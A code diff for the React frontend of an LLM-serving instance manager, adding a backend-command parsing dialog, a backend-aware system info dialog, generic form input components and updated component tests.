setNameError(""); // Reset any name errors
}
}, [open, instance]);
const handleFieldChange = (key: keyof CreateInstanceOptions, value: any) => {
setFormData((prev) => {
// If backend_type is changing, clear backend_options
if (key === 'backend_type' && prev.backend_type !== value) {
return {
...prev,
[key]: value,
backend_options: {}, // Clear backend options when backend type changes
};
}
return {
...prev,
[key]: value,
};
});
};
const handleBackendFieldChange = (key: string, value: any) => {
setFormData((prev) => ({
...prev,
[key]: value,
backend_options: {
...prev.backend_options,
[key]: value,
} as any,
}));
};
@@ -90,7 +106,24 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
// Clean up undefined values to avoid sending empty fields
const cleanOptions: CreateInstanceOptions = {};
Object.entries(formData).forEach(([key, value]) => {
if (value !== undefined && value !== "" && value !== null) {
if (key === 'backend_options' && value && typeof value === 'object') {
// Handle backend_options specially - clean nested object
const cleanBackendOptions: any = {};
Object.entries(value).forEach(([backendKey, backendValue]) => {
if (backendValue !== undefined && backendValue !== null && (typeof backendValue !== 'string' || backendValue.trim() !== "")) {
// Handle arrays - don't include empty arrays
if (Array.isArray(backendValue) && backendValue.length === 0) {
return;
}
cleanBackendOptions[backendKey] = backendValue;
}
});
// Only include backend_options if it has content
if (Object.keys(cleanBackendOptions).length > 0) {
(cleanOptions as any)[key] = cleanBackendOptions;
}
} else if (value !== undefined && value !== null && (typeof value !== 'string' || value.trim() !== "")) {
// Handle arrays - don't include empty arrays
if (Array.isArray(value) && value.length === 0) {
return;
@@ -107,12 +140,25 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
onOpenChange(false);
};
const toggleAdvanced = () => {
setShowAdvanced(!showAdvanced);
const handleCommandParsed = (parsedOptions: CreateInstanceOptions) => {
setFormData(prev => ({
...prev,
...parsedOptions,
}));
setShowParseDialog(false);
};
// Check if auto_restart is enabled
const isAutoRestartEnabled = formData.auto_restart === true;
// Save button label logic
let saveButtonLabel = "Create Instance";
if (isEditing) {
if (instance?.status === "running") {
saveButtonLabel = "Update & Restart Instance";
} else {
saveButtonLabel = "Update Instance";
}
}
return (
<Dialog open={open} onOpenChange={onOpenChange}>
@@ -129,125 +175,25 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
</DialogHeader>
<div className="flex-1 overflow-y-auto">
<div className="grid gap-6 py-4">
{/* Instance Name - Special handling since it's not in CreateInstanceOptions */}
<div className="grid gap-2">
<Label htmlFor="name">
Instance Name <span className="text-red-500">*</span>
</Label>
<Input
id="name"
value={instanceName}
onChange={(e) => handleNameChange(e.target.value)}
placeholder="my-instance"
disabled={isEditing} // Don't allow name changes when editing
className={nameError ? "border-red-500" : ""}
/>
{nameError && <p className="text-sm text-red-500">{nameError}</p>}
<p className="text-sm text-muted-foreground">
Unique identifier for the instance
</p>
</div>
<div className="space-y-6 py-4">
{/* Instance Settings Card */}
<InstanceSettingsCard
instanceName={instanceName}
nameError={nameError}
isEditing={isEditing}
formData={formData}
onNameChange={handleNameChange}
onChange={handleFieldChange}
/>
{/* Auto Restart Configuration Section */}
<div className="space-y-4">
<h3 className="text-lg font-medium">
Auto Restart Configuration
</h3>
{/* Backend Configuration Card */}
<BackendConfigurationCard
formData={formData}
onBackendFieldChange={handleBackendFieldChange}
onChange={handleFieldChange}
onParseCommand={() => setShowParseDialog(true)}
/>
{/* Auto Restart Toggle */}
<ZodFormField
fieldKey="auto_restart"
value={formData.auto_restart}
onChange={handleFieldChange}
/>
{/* Show restart options only when auto restart is enabled */}
{isAutoRestartEnabled && (
<div className="ml-6 space-y-4 border-l-2 border-muted pl-4">
<ZodFormField
fieldKey="max_restarts"
value={formData.max_restarts}
onChange={handleFieldChange}
/>
<ZodFormField
fieldKey="restart_delay"
value={formData.restart_delay}
onChange={handleFieldChange}
/>
</div>
)}
</div>
{/* Basic Fields - Automatically generated from type (excluding auto restart options) */}
<div className="space-y-4">
<h3 className="text-lg font-medium">Basic Configuration</h3>
{basicFields
.filter(
(fieldKey) =>
fieldKey !== "auto_restart" &&
fieldKey !== "max_restarts" &&
fieldKey !== "restart_delay"
) // Exclude auto_restart, max_restarts, and restart_delay as they're handled above
.map((fieldKey) => (
<ZodFormField
key={fieldKey}
fieldKey={fieldKey}
value={formData[fieldKey]}
onChange={handleFieldChange}
/>
))}
</div>
{/* Advanced Fields Toggle */}
<div className="border-t pt-4">
<Button
variant="ghost"
onClick={toggleAdvanced}
className="flex items-center gap-2 p-0 h-auto font-medium"
>
{showAdvanced ? (
<ChevronDown className="h-4 w-4" />
) : (
<ChevronRight className="h-4 w-4" />
)}
Advanced Configuration
<span className="text-muted-foreground text-sm font-normal">
(
{
advancedFields.filter(
(f) =>
!["max_restarts", "restart_delay"].includes(f as string)
).length
}{" "}
options)
</span>
</Button>
</div>
{/* Advanced Fields - Automatically generated from type (excluding restart options) */}
{showAdvanced && (
<div className="space-y-4 pl-6 border-l-2 border-muted">
<div className="space-y-4">
{advancedFields
.filter(
(fieldKey) =>
!["max_restarts", "restart_delay"].includes(
fieldKey as string
)
) // Exclude restart options as they're handled above
.sort()
.map((fieldKey) => (
<ZodFormField
key={fieldKey}
fieldKey={fieldKey}
value={formData[fieldKey]}
onChange={handleFieldChange}
/>
))}
</div>
</div>
)}
</div>
</div>
@@ -264,14 +210,17 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
disabled={!instanceName.trim() || !!nameError}
data-testid="dialog-save-button"
>
{saveButtonLabel}
</Button>
</DialogFooter>
</DialogContent>
<ParseCommandDialog
open={showParseDialog}
onOpenChange={setShowParseDialog}
onParsed={handleCommandParsed}
backendType={formData.backend_type || BackendType.LLAMA_CPP}
/>
</Dialog>
);
};

View File

@@ -0,0 +1,151 @@
import React, { useState } from "react";
import { Button } from "@/components/ui/button";
import { Label } from "@/components/ui/label";
import {
Dialog,
DialogContent,
DialogDescription,
DialogFooter,
DialogHeader,
DialogTitle,
} from "@/components/ui/dialog";
import { BackendType, type BackendTypeValue, type CreateInstanceOptions } from "@/types/instance";
import { backendsApi } from "@/lib/api";
import { toast } from "sonner";
interface ParseCommandDialogProps {
open: boolean;
onOpenChange: (open: boolean) => void;
onParsed: (options: CreateInstanceOptions) => void;
backendType: BackendTypeValue;
}
const ParseCommandDialog: React.FC<ParseCommandDialogProps> = ({
open,
onOpenChange,
onParsed,
backendType,
}) => {
const [command, setCommand] = useState('');
const [loading, setLoading] = useState(false);
const [error, setError] = useState<string | null>(null);
const handleParse = async () => {
if (!command.trim()) {
setError("Command cannot be empty");
return;
}
setLoading(true);
setError(null);
try {
let options: CreateInstanceOptions;
// Parse based on selected backend type
switch (backendType) {
case BackendType.LLAMA_CPP:
options = await backendsApi.llamaCpp.parseCommand(command);
break;
case BackendType.MLX_LM:
options = await backendsApi.mlx.parseCommand(command);
break;
case BackendType.VLLM:
options = await backendsApi.vllm.parseCommand(command);
break;
default:
throw new Error(`Unsupported backend type: ${backendType}`);
}
onParsed(options);
onOpenChange(false);
setCommand('');
setError(null);
toast.success('Command parsed successfully');
} catch (err) {
const errorMessage = err instanceof Error ? err.message : 'Failed to parse command';
setError(errorMessage);
toast.error('Failed to parse command', {
description: errorMessage
});
} finally {
setLoading(false);
}
};
const handleOpenChange = (open: boolean) => {
if (!open) {
setCommand('');
setError(null);
}
onOpenChange(open);
};
const backendPlaceholders: Record<BackendTypeValue, string> = {
[BackendType.LLAMA_CPP]: "llama-server --model /path/to/model.gguf --gpu-layers 32 --ctx-size 4096",
[BackendType.MLX_LM]: "mlx_lm.server --model mlx-community/Mistral-7B-Instruct-v0.3-4bit --host 0.0.0.0 --port 8080",
[BackendType.VLLM]: "vllm serve microsoft/DialoGPT-medium --tensor-parallel-size 2 --gpu-memory-utilization 0.9",
};
const getPlaceholderForBackend = (backendType: BackendTypeValue): string => {
return backendPlaceholders[backendType] || "Enter your command here...";
};
return (
<Dialog open={open} onOpenChange={handleOpenChange}>
<DialogContent className="sm:max-w-[600px]">
<DialogHeader>
<DialogTitle>Parse Backend Command</DialogTitle>
<DialogDescription>
Select your backend type and paste the command to automatically populate the form fields
</DialogDescription>
</DialogHeader>
<div className="space-y-4">
<div>
<Label className="text-sm font-medium">Backend Type:
<span className="font-normal text-muted-foreground">
{backendType === BackendType.LLAMA_CPP && 'Llama Server'}
{backendType === BackendType.MLX_LM && 'MLX LM'}
{backendType === BackendType.VLLM && 'vLLM'}
</span>
</Label>
</div>
<div>
<Label htmlFor="command">Command</Label>
<textarea
id="command"
value={command}
onChange={(e) => setCommand(e.target.value)}
placeholder={getPlaceholderForBackend(backendType)}
className="w-full h-32 p-3 mt-2 border border-input rounded-md font-mono text-sm resize-vertical focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2"
/>
</div>
{error && (
<div className="text-destructive text-sm bg-destructive/10 p-3 rounded-md">
{error}
</div>
)}
</div>
<DialogFooter>
<Button variant="outline" onClick={() => handleOpenChange(false)}>
Cancel
</Button>
<Button
onClick={() => {
handleParse().catch(console.error);
}}
disabled={!command.trim() || loading}
>
{loading ? 'Parsing...' : 'Parse Command'}
</Button>
</DialogFooter>
</DialogContent>
</Dialog>
);
};
export default ParseCommandDialog;
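A minimal usage sketch for wiring ParseCommandDialog from a parent form; the wrapper component below is illustrative and the import path '@/components/ParseCommandDialog' is an assumption, since the dialog's file path is not shown in this diff. Parsed options are merged into local form state the same way InstanceDialog does above.

import React, { useState } from "react";
import { Button } from "@/components/ui/button";
import ParseCommandDialog from "@/components/ParseCommandDialog"; // assumed path
import { BackendType, type CreateInstanceOptions } from "@/types/instance";

const ParseCommandExample: React.FC = () => {
  const [open, setOpen] = useState(false);
  const [options, setOptions] = useState<CreateInstanceOptions>({
    backend_type: BackendType.LLAMA_CPP,
  });

  return (
    <>
      <Button onClick={() => setOpen(true)}>Parse Command</Button>
      <ParseCommandDialog
        open={open}
        onOpenChange={setOpen}
        backendType={options.backend_type || BackendType.LLAMA_CPP}
        // Merge the parsed options into the existing form state
        onParsed={(parsed) => setOptions((prev) => ({ ...prev, ...parsed }))}
      />
    </>
  );
};

export default ParseCommandExample;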

View File

@@ -8,16 +8,19 @@ import {
DialogHeader,
DialogTitle,
} from '@/components/ui/dialog'
import SelectInput from '@/components/form/SelectInput'
import {
RefreshCw,
AlertCircle,
Loader2,
ChevronDown,
ChevronRight,
Monitor,
HelpCircle,
Info
} from 'lucide-react'
import { serverApi } from '@/lib/api'
import { BackendType, type BackendTypeValue } from '@/types/instance'
// Helper to get version from environment
const getAppVersion = (): string => {
@@ -28,166 +31,234 @@ const getAppVersion = (): string => {
}
}
interface SystemInfoDialogProps {
open: boolean
onOpenChange: (open: boolean) => void
}
interface BackendInfo {
version: string
devices: string
help: string
}
const BACKEND_OPTIONS = [
{ value: BackendType.LLAMA_CPP, label: 'Llama Server' },
{ value: BackendType.MLX_LM, label: 'MLX LM' },
{ value: BackendType.VLLM, label: 'vLLM' },
]
const SystemInfoDialog: React.FC<SystemInfoDialogProps> = ({
open,
onOpenChange
}) => {
const [selectedBackend, setSelectedBackend] = useState<BackendTypeValue>(BackendType.LLAMA_CPP)
const [backendInfo, setBackendInfo] = useState<BackendInfo | null>(null)
const [loading, setLoading] = useState(false)
const [error, setError] = useState<string | null>(null)
const [showHelp, setShowHelp] = useState(false)
// Fetch backend info
const fetchBackendInfo = async (backend: BackendTypeValue) => {
if (backend !== BackendType.LLAMA_CPP) {
setBackendInfo(null)
setError(null)
return
}
setLoading(true)
setError(null)
try {
const [version, devices, help] = await Promise.all([
serverApi.getVersion(),
serverApi.getDevices(),
serverApi.getHelp()
])
setBackendInfo({ version, devices, help })
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to fetch backend info')
} finally {
setLoading(false)
}
}
// Load data when dialog opens or backend changes
useEffect(() => {
if (open) {
void fetchBackendInfo(selectedBackend)
}
}, [open, selectedBackend])
const handleBackendChange = (value: string) => {
setSelectedBackend(value as BackendTypeValue)
setShowHelp(false) // Reset help section when switching backends
}
const renderBackendSpecificContent = () => {
if (selectedBackend !== BackendType.LLAMA_CPP) {
return (
<div className="flex items-center justify-center py-8">
<div className="text-center space-y-3">
<Info className="h-8 w-8 text-gray-400 mx-auto" />
<div>
<h3 className="font-semibold text-gray-700">Backend Info Not Available</h3>
<p className="text-sm text-gray-500 mt-1">
Information for {BACKEND_OPTIONS.find(b => b.value === selectedBackend)?.label} backend is not yet implemented.
</p>
</div>
</div>
</div>
)
}
if (loading && !backendInfo) {
return (
<div className="flex items-center justify-center py-8">
<Loader2 className="h-6 w-6 animate-spin text-gray-400" />
<span className="ml-2 text-gray-400">Loading backend information...</span>
</div>
)
}
if (error) {
return (
<div className="flex items-center gap-2 p-4 bg-destructive/10 border border-destructive/20 rounded-lg">
<AlertCircle className="h-4 w-4 text-destructive" />
<span className="text-sm text-destructive">{error}</span>
</div>
)
}
if (!backendInfo) {
return null
}
return (
<div className="space-y-6">
{/* Backend Version Section */}
<div className="space-y-3">
<h3 className="font-semibold">
{BACKEND_OPTIONS.find(b => b.value === selectedBackend)?.label} Version
</h3>
<div className="bg-gray-900 rounded-lg p-4">
<div className="mb-2">
<span className="text-sm text-gray-400">$ llama-server --version</span>
</div>
<pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono">
{backendInfo.version}
</pre>
</div>
</div>
{/* Devices Section */}
<div className="space-y-3">
<div className="flex items-center gap-2">
<h3 className="font-semibold">Available Devices</h3>
</div>
<div className="bg-gray-900 rounded-lg p-4">
<div className="mb-2">
<span className="text-sm text-gray-400">$ llama-server --list-devices</span>
</div>
<pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono">
{backendInfo.devices}
</pre>
</div>
</div>
{/* Help Section */}
<div className="space-y-3">
<Button
variant="ghost"
onClick={() => setShowHelp(!showHelp)}
className="flex items-center gap-2 p-0 h-auto font-semibold"
>
{showHelp ? (
<ChevronDown className="h-4 w-4" />
) : (
<ChevronRight className="h-4 w-4" />
)}
<HelpCircle className="h-4 w-4" />
Command Line Options
</Button>
{showHelp && (
<div className="bg-gray-900 rounded-lg p-4">
<div className="mb-2">
<span className="text-sm text-gray-400">$ llama-server --help</span>
</div>
<pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono max-h-64 overflow-y-auto">
{backendInfo.help}
</pre>
</div>
)}
</div>
</div>
)
}
return (
<Dialog open={open} onOpenChange={onOpenChange}>
<DialogContent className="sm:max-w-4xl max-w-[calc(100%-2rem)] max-h-[80vh] flex flex-col">
<DialogHeader>
<div className="flex items-center justify-between">
<div>
<DialogTitle className="flex items-center gap-2">
<Monitor className="h-5 w-5" />
System Information
</DialogTitle>
<DialogDescription>
Llama.cpp server environment and capabilities
</DialogDescription>
</div>
<Button
variant="outline"
size="sm"
onClick={fetchSystemInfo}
disabled={loading}
>
{loading ? (
<Loader2 className="h-4 w-4 animate-spin" />
) : (
<RefreshCw className="h-4 w-4" />
)}
</Button>
</div>
<DialogTitle className="flex items-center gap-2">
<Monitor className="h-5 w-5" />
System Information
</DialogTitle>
<DialogDescription>
View system and backend-specific environment and capabilities
</DialogDescription>
</DialogHeader>
<div className="flex-1 overflow-y-auto">
<div className="space-y-6">
{/* Llamactl Version Section - Always shown */}
<div className="space-y-3">
<h3 className="font-semibold">Llamactl Version</h3>
<div className="bg-gray-900 rounded-lg p-4">
<pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono">
{getAppVersion()}
</pre>
</div>
</div>
{/* Backend Selection Section */}
<div className="space-y-3">
<h3 className="font-semibold">Backend Information</h3>
<div className="flex items-center gap-3">
<div className="flex-1">
<SelectInput
id="backend-select"
label=""
value={selectedBackend}
onChange={(value) => handleBackendChange(value || BackendType.LLAMA_CPP)}
options={BACKEND_OPTIONS}
className="text-sm"
/>
</div>
{selectedBackend === BackendType.LLAMA_CPP && (
<Button
variant="outline"
size="sm"
onClick={() => void fetchBackendInfo(selectedBackend)}
disabled={loading}
>
{loading ? (
<Loader2 className="h-4 w-4 animate-spin" />
) : (
<RefreshCw className="h-4 w-4" />
)}
</Button>
)}
</div>
</div>
{/* Backend-specific content */}
{renderBackendSpecificContent()}
</div>
</div>
<DialogFooter>

View File

@@ -3,6 +3,7 @@ import { render, screen } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
import InstanceCard from '@/components/InstanceCard'
import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
// Mock the health hook since we're not testing health logic here
vi.mock('@/hooks/useInstanceHealth', () => ({
@@ -17,14 +18,14 @@ describe('InstanceCard - Instance Actions and State', () => {
const stoppedInstance: Instance = {
name: 'test-instance',
status: 'stopped',
options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'test-model.gguf' } }
}
const runningInstance: Instance = {
name: 'running-instance',
status: 'running',
options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'running-model.gguf' } }
}
beforeEach(() => {
@@ -101,7 +102,7 @@ afterEach(() => {
it('opens logs dialog when logs button clicked', async () => {
const user = userEvent.setup()
render(
<InstanceCard
instance={stoppedInstance}
@@ -112,9 +113,13 @@ afterEach(() => {
/>
)
// First click "More actions" to reveal the logs button
const moreActionsButton = screen.getByTitle('More actions')
await user.click(moreActionsButton)
const logsButton = screen.getByTitle('View logs')
await user.click(logsButton)
// Should open logs dialog (we can verify this by checking if dialog title appears)
expect(screen.getByText(`Logs: ${stoppedInstance.name}`)).toBeInTheDocument()
})
@@ -124,7 +129,7 @@ afterEach(() => {
it('shows confirmation dialog and calls deleteInstance when confirmed', async () => {
const user = userEvent.setup()
const confirmSpy = vi.spyOn(window, 'confirm').mockReturnValue(true)
render(
<InstanceCard
instance={stoppedInstance}
@@ -135,19 +140,23 @@ afterEach(() => {
/>
)
// First click "More actions" to reveal the delete button
const moreActionsButton = screen.getByTitle('More actions')
await user.click(moreActionsButton)
const deleteButton = screen.getByTitle('Delete instance')
await user.click(deleteButton)
expect(confirmSpy).toHaveBeenCalledWith('Are you sure you want to delete instance "test-instance"?')
expect(mockDeleteInstance).toHaveBeenCalledWith('test-instance')
confirmSpy.mockRestore()
})
it('does not call deleteInstance when confirmation cancelled', async () => {
const user = userEvent.setup()
const confirmSpy = vi.spyOn(window, 'confirm').mockReturnValue(false)
render(
<InstanceCard
instance={stoppedInstance}
@@ -158,18 +167,24 @@ afterEach(() => {
/>
)
// First click "More actions" to reveal the delete button
const moreActionsButton = screen.getByTitle('More actions')
await user.click(moreActionsButton)
const deleteButton = screen.getByTitle('Delete instance')
await user.click(deleteButton)
expect(confirmSpy).toHaveBeenCalled()
expect(mockDeleteInstance).not.toHaveBeenCalled()
confirmSpy.mockRestore()
})
})
describe('Button State Based on Instance Status', () => {
it('disables start button and enables stop button for running instance', async () => {
const user = userEvent.setup()
render(
<InstanceCard
instance={runningInstance}
@@ -180,12 +195,19 @@ afterEach(() => {
/>
)
expect(screen.queryByTitle('Start instance')).not.toBeInTheDocument()
expect(screen.getByTitle('Stop instance')).not.toBeDisabled()
// Expand more actions to access delete button
const moreActionsButton = screen.getByTitle('More actions')
await user.click(moreActionsButton)
expect(screen.getByTitle('Delete instance')).toBeDisabled() // Can't delete running instance
})
it('enables start button and disables stop button for stopped instance', async () => {
const user = userEvent.setup()
render(
<InstanceCard
instance={stoppedInstance}
@@ -197,11 +219,18 @@ afterEach(() => {
)
expect(screen.getByTitle('Start instance')).not.toBeDisabled()
expect(screen.queryByTitle('Stop instance')).not.toBeInTheDocument()
// Expand more actions to access delete button
const moreActionsButton = screen.getByTitle('More actions')
await user.click(moreActionsButton)
expect(screen.getByTitle('Delete instance')).not.toBeDisabled() // Can delete stopped instance
})
it('edit and logs buttons are always enabled', async () => {
const user = userEvent.setup()
render(
<InstanceCard
instance={runningInstance}
@@ -213,6 +242,11 @@ afterEach(() => {
)
expect(screen.getByTitle('Edit instance')).not.toBeDisabled()
// Expand more actions to access logs button
const moreActionsButton = screen.getByTitle('More actions')
await user.click(moreActionsButton)
expect(screen.getByTitle('View logs')).not.toBeDisabled()
})
})
@@ -267,7 +301,7 @@ afterEach(() => {
describe('Integration with LogsModal', () => {
it('passes correct props to LogsModal', async () => {
const user = userEvent.setup()
render(
<InstanceCard
instance={runningInstance}
@@ -278,20 +312,24 @@ afterEach(() => {
/>
)
// First click "More actions" to reveal the logs button
const moreActionsButton = screen.getByTitle('More actions')
await user.click(moreActionsButton)
// Open logs dialog
await user.click(screen.getByTitle('View logs'))
// Verify dialog opened with correct instance data
expect(screen.getByText('Logs: running-instance')).toBeInTheDocument()
// Close dialog to test close functionality
const closeButtons = screen.getAllByText('Close')
const dialogCloseButton = closeButtons.find(button =>
button.closest('[data-slot="dialog-content"]')
)
expect(dialogCloseButton).toBeTruthy()
await user.click(dialogCloseButton!)
// Modal should close
expect(screen.queryByText('Logs: running-instance')).not.toBeInTheDocument()
})
@@ -301,7 +339,7 @@ afterEach(() => {
it('handles instance with minimal data', () => {
const minimalInstance: Instance = {
name: 'minimal',
status: 'stopped',
options: {}
}
@@ -323,7 +361,7 @@ afterEach(() => {
it('handles instance with undefined options', () => {
const instanceWithoutOptions: Instance = {
name: 'no-options',
status: 'running',
options: undefined
}

View File

@@ -5,6 +5,7 @@ import InstanceList from '@/components/InstanceList'
import { InstancesProvider } from '@/contexts/InstancesContext'
import { instancesApi } from '@/lib/api'
import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
import { AuthProvider } from '@/contexts/AuthContext'
// Mock the API
@@ -44,9 +45,9 @@ describe('InstanceList - State Management and UI Logic', () => {
const mockEditInstance = vi.fn()
const mockInstances: Instance[] = [
{ name: 'instance-1', status: 'stopped', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model1.gguf' } } },
{ name: 'instance-2', status: 'running', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model2.gguf' } } },
{ name: 'instance-3', status: 'stopped', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model3.gguf' } } }
]
const DUMMY_API_KEY = 'test-api-key-123'

View File

@@ -3,6 +3,7 @@ import { render, screen, waitFor } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
import InstanceDialog from '@/components/InstanceDialog'
import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
describe('InstanceModal - Form Logic and Validation', () => {
const mockOnSave = vi.fn()
@@ -91,6 +92,7 @@ afterEach(() => {
expect(mockOnSave).toHaveBeenCalledWith('my-instance', {
auto_restart: true, // Default value
backend_type: BackendType.LLAMA_CPP
})
})
@@ -134,10 +136,10 @@ afterEach(() => {
describe('Edit Mode', () => {
const mockInstance: Instance = {
name: 'existing-instance',
status: 'stopped',
options: {
backend_type: BackendType.LLAMA_CPP,
backend_options: { model: 'test-model.gguf', gpu_layers: 10 },
auto_restart: false
}
}
@@ -177,15 +179,15 @@ afterEach(() => {
await user.click(screen.getByTestId('dialog-save-button'))
expect(mockOnSave).toHaveBeenCalledWith('existing-instance', {
backend_type: BackendType.LLAMA_CPP,
backend_options: { model: 'test-model.gguf', gpu_layers: 10 },
auto_restart: false
})
})
it('shows correct button text for running vs stopped instances', () => {
const runningInstance: Instance = { ...mockInstance, status: 'running' }
const { rerender } = render(
<InstanceDialog
open={true}
@@ -271,35 +273,13 @@ afterEach(() => {
expect(mockOnSave).toHaveBeenCalledWith('test-instance', {
auto_restart: true,
backend_type: BackendType.LLAMA_CPP,
max_restarts: 5,
restart_delay: 10
})
})
})
describe('Advanced Fields Toggle', () => {
it('shows advanced fields when toggle clicked', async () => {
const user = userEvent.setup()
render(
<InstanceDialog
open={true}
onOpenChange={mockOnOpenChange}
onSave={mockOnSave}
/>
)
// Advanced fields should be hidden initially
expect(screen.queryByText(/Advanced Configuration/)).toBeInTheDocument()
// Click to expand
await user.click(screen.getByText(/Advanced Configuration/))
// Should show more configuration options
// Note: Specific fields depend on zodFormUtils configuration
// We're testing the toggle behavior, not specific fields
})
})
describe('Form Data Handling', () => {
it('cleans up undefined values before submission', async () => {
@@ -321,6 +301,7 @@ afterEach(() => {
// Should only include non-empty values
expect(mockOnSave).toHaveBeenCalledWith('clean-instance', {
auto_restart: true, // Only this default value should be included
backend_type: BackendType.LLAMA_CPP
})
})
@@ -345,7 +326,8 @@ afterEach(() => {
expect(mockOnSave).toHaveBeenCalledWith('numeric-test', {
auto_restart: true,
backend_type: BackendType.LLAMA_CPP,
backend_options: { gpu_layers: 15 }, // Should be number, not string
})
})
})

View File

@@ -0,0 +1,62 @@
import React from 'react'
import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label'
interface ArrayInputProps {
id: string
label: string
value: string[] | undefined
onChange: (value: string[] | undefined) => void
placeholder?: string
description?: string
disabled?: boolean
className?: string
}
const ArrayInput: React.FC<ArrayInputProps> = ({
id,
label,
value,
onChange,
placeholder = "item1, item2, item3",
description,
disabled = false,
className
}) => {
const handleChange = (inputValue: string) => {
if (inputValue === '') {
onChange(undefined)
return
}
const arrayValue = inputValue
.split(',')
.map(s => s.trim())
.filter(Boolean)
onChange(arrayValue.length > 0 ? arrayValue : undefined)
}
return (
<div className="grid gap-2">
<Label htmlFor={id}>
{label}
</Label>
<Input
id={id}
type="text"
value={Array.isArray(value) ? value.join(', ') : ''}
onChange={(e) => handleChange(e.target.value)}
placeholder={placeholder}
disabled={disabled}
className={className}
/>
{description && (
<p className="text-sm text-muted-foreground">{description}</p>
)}
<p className="text-xs text-muted-foreground">Separate multiple values with commas</p>
</div>
)
}
export default ArrayInput
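A short usage sketch for ArrayInput showing the comma-separated string to string[] round trip the component implements. The host component, field name, and the import path '@/components/form/ArrayInput' are illustrative assumptions; only the prop shapes come from the component above.

import React, { useState } from "react";
import ArrayInput from "@/components/form/ArrayInput"; // assumed path

const ApiKeysField: React.FC = () => {
  // undefined means "not set"; the component clears back to undefined on empty input
  const [apiKeys, setApiKeys] = useState<string[] | undefined>(undefined);

  return (
    <ArrayInput
      id="api_keys"
      label="API Keys"
      value={apiKeys}
      onChange={setApiKeys}
      placeholder="key1, key2"
      description="Typing 'a, b, c' yields ['a', 'b', 'c']"
    />
  );
};

export default ApiKeysField;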

View File

@@ -0,0 +1,42 @@
import React from 'react'
import { Checkbox } from '@/components/ui/checkbox'
import { Label } from '@/components/ui/label'
interface CheckboxInputProps {
id: string
label: string
value: boolean | undefined
onChange: (value: boolean) => void
description?: string
disabled?: boolean
className?: string
}
const CheckboxInput: React.FC<CheckboxInputProps> = ({
id,
label,
value,
onChange,
description,
disabled = false,
className
}) => {
return (
<div className={`flex items-center space-x-2 ${className || ''}`}>
<Checkbox
id={id}
checked={value === true}
onCheckedChange={(checked) => onChange(!!checked)}
disabled={disabled}
/>
<Label htmlFor={id} className="text-sm font-normal">
{label}
{description && (
<span className="text-muted-foreground ml-1">- {description}</span>
)}
</Label>
</div>
)
}
export default CheckboxInput

View File

@@ -0,0 +1,144 @@
import React, { useState } from 'react'
import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label'
import { Button } from '@/components/ui/button'
import { X, Plus } from 'lucide-react'
interface EnvironmentVariablesInputProps {
id: string
label: string
value: Record<string, string> | undefined
onChange: (value: Record<string, string> | undefined) => void
description?: string
disabled?: boolean
className?: string
}
interface EnvVar {
key: string
value: string
}
const EnvironmentVariablesInput: React.FC<EnvironmentVariablesInputProps> = ({
id,
label,
value,
onChange,
description,
disabled = false,
className
}) => {
// Convert the value object to an array of key-value pairs for editing
const envVarsFromValue = value
? Object.entries(value).map(([key, val]) => ({ key, value: val }))
: []
const [envVars, setEnvVars] = useState<EnvVar[]>(
envVarsFromValue.length > 0 ? envVarsFromValue : [{ key: '', value: '' }]
)
// Update parent component when env vars change
const updateParent = (newEnvVars: EnvVar[]) => {
// Filter out empty entries
const validVars = newEnvVars.filter(env => env.key.trim() !== '' && env.value.trim() !== '')
if (validVars.length === 0) {
onChange(undefined)
} else {
const envObject = validVars.reduce((acc, env) => {
acc[env.key.trim()] = env.value.trim()
return acc
}, {} as Record<string, string>)
onChange(envObject)
}
}
const handleKeyChange = (index: number, newKey: string) => {
const newEnvVars = [...envVars]
newEnvVars[index].key = newKey
setEnvVars(newEnvVars)
updateParent(newEnvVars)
}
const handleValueChange = (index: number, newValue: string) => {
const newEnvVars = [...envVars]
newEnvVars[index].value = newValue
setEnvVars(newEnvVars)
updateParent(newEnvVars)
}
const addEnvVar = () => {
const newEnvVars = [...envVars, { key: '', value: '' }]
setEnvVars(newEnvVars)
}
const removeEnvVar = (index: number) => {
if (envVars.length === 1) {
// Reset to empty if it's the last one
const newEnvVars = [{ key: '', value: '' }]
setEnvVars(newEnvVars)
updateParent(newEnvVars)
} else {
const newEnvVars = envVars.filter((_, i) => i !== index)
setEnvVars(newEnvVars)
updateParent(newEnvVars)
}
}
return (
<div className={`grid gap-2 ${className || ''}`}>
<Label htmlFor={id}>
{label}
</Label>
<div className="space-y-2">
{envVars.map((envVar, index) => (
<div key={index} className="flex gap-2 items-center">
<Input
placeholder="Variable name"
value={envVar.key}
onChange={(e) => handleKeyChange(index, e.target.value)}
disabled={disabled}
className="flex-1"
/>
<Input
placeholder="Variable value"
value={envVar.value}
onChange={(e) => handleValueChange(index, e.target.value)}
disabled={disabled}
className="flex-1"
/>
<Button
type="button"
variant="outline"
size="sm"
onClick={() => removeEnvVar(index)}
disabled={disabled}
className="shrink-0"
>
<X className="h-4 w-4" />
</Button>
</div>
))}
<Button
type="button"
variant="outline"
size="sm"
onClick={addEnvVar}
disabled={disabled}
className="w-fit"
>
<Plus className="h-4 w-4 mr-2" />
Add Variable
</Button>
</div>
{description && (
<p className="text-sm text-muted-foreground">{description}</p>
)}
<p className="text-xs text-muted-foreground">
Environment variables that will be passed to the backend process
</p>
</div>
)
}
export default EnvironmentVariablesInput
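A usage sketch for EnvironmentVariablesInput, mirroring how InstanceSettingsCard wires it later in this change set; the wrapper component and the seeded variable are illustrative only.

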